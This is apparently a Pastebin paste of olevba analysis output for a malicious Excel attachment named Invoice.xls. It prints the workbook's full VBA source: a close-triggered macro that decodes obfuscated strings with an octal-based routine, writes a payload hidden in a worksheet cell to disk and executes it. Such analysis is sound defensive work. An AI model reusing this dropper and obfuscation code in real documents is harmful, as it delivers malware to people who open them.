API tools faq
paste
Advertisement
dynamoo

Malicious Excel macro

dynamoo
Apr 8th, 2015
655
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 5.13 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:M-S---- Invoice.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Invoice.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_BeforeClose(Cancel As Boolean)
  16. hjgHGjkdg
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. No suspicious keyword or IOC found.
  21. -------------------------------------------------------------------------------
  22. VBA MACRO Ëèñò1.cls
  23. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. Option Explicit
  26.  
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. ANALYSIS:
  29. No suspicious keyword or IOC found.
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ëèñò2.cls
  32. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. Option Explicit
  35.  
  36. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  37. ANALYSIS:
  38. No suspicious keyword or IOC found.
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Ëèñò3.cls
  41. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Module1.bas
  46. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. Sub hjgHGjkdg()
  49. Dim PathToSave
  50. PathToSave = DecryptEPI("-exxhe|e-†“–kjj—£’8¦Ž£")
  51. Dim WshShell
  52. Set WshShell = CreateObject(DecryptEPI("{¢— ¤8{–‘šš"))
  53. PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
  54. Set s = CreateObject(DecryptEPI("ehuhf8{¤¢‘›"))
  55. s.Mode = 3
  56. s.Type = 2
  57. s.Open
  58. s.WriteText Worksheets(DecryptEPI("’™")).Range(DecryptEPI("h><")).Value
  59. Call s.SaveToFile(PathToSave, 2)
  60. WshShell.Run PathToSave
  61. End Sub
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+--------------+-----------------------------------------+
  71. | Type       | Keyword      | Description                             |
  72. +------------+--------------+-----------------------------------------+
  73. | Suspicious | CreateObject | May create an OLE object                |
  74. | Suspicious | WriteText    | May create a text file                  |
  75. | Suspicious | SaveToFile   | May create a text file                  |
  76. | Suspicious | Open         | May open a file                         |
  77. | Suspicious | Run          | May run an executable file or a system  |
  78. |            |              | command                                 |
  79. +------------+--------------+-----------------------------------------+
  80. -------------------------------------------------------------------------------
  81. VBA MACRO Module2.bas
  82. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84. Public Function DecryptEPI(sString As String) As String
  85.     Dim I As Integer
  86.     Dim sLen As Integer, sBuffer As String
  87.     sLen = Len(sString)
  88.     For I = 1 To sLen
  89.         sBuffer = sBuffer & Chr(Oct2Dec(Asc(Mid(sString, I, 1))))
  90.     Next I
  91.     DecryptEPI = sBuffer
  92. End Function
  93.  
  94. Private Function Oct2Dec(Number As String) As Integer
  95.     Dim I As Integer
  96.     Dim sLen As String, sBuffer As Integer, iNumb As Integer
  97.     sLen = Len(Number)
  98.     For I = 0 To sLen
  99.         iNumb = Val(Mid(StrReverse(Number), I + 1, 1))
  100.         sBuffer = sBuffer + ((8 ^ I) * iNumb)
  101.     Next I
  102.     Oct2Dec = sBuffer
  103. End Function
  104.  
  105. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  106. ANALYSIS:
  107. +------------+------------+-----------------------------------------+
  108. | Type       | Keyword    | Description                             |
  109. +------------+------------+-----------------------------------------+
  110. | Suspicious | Chr        | May attempt to obfuscate specific       |
  111. |            |            | strings                                 |
  112. | Suspicious | StrReverse | May attempt to obfuscate specific       |
  113. |            |            | strings                                 |
  114. +------------+------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!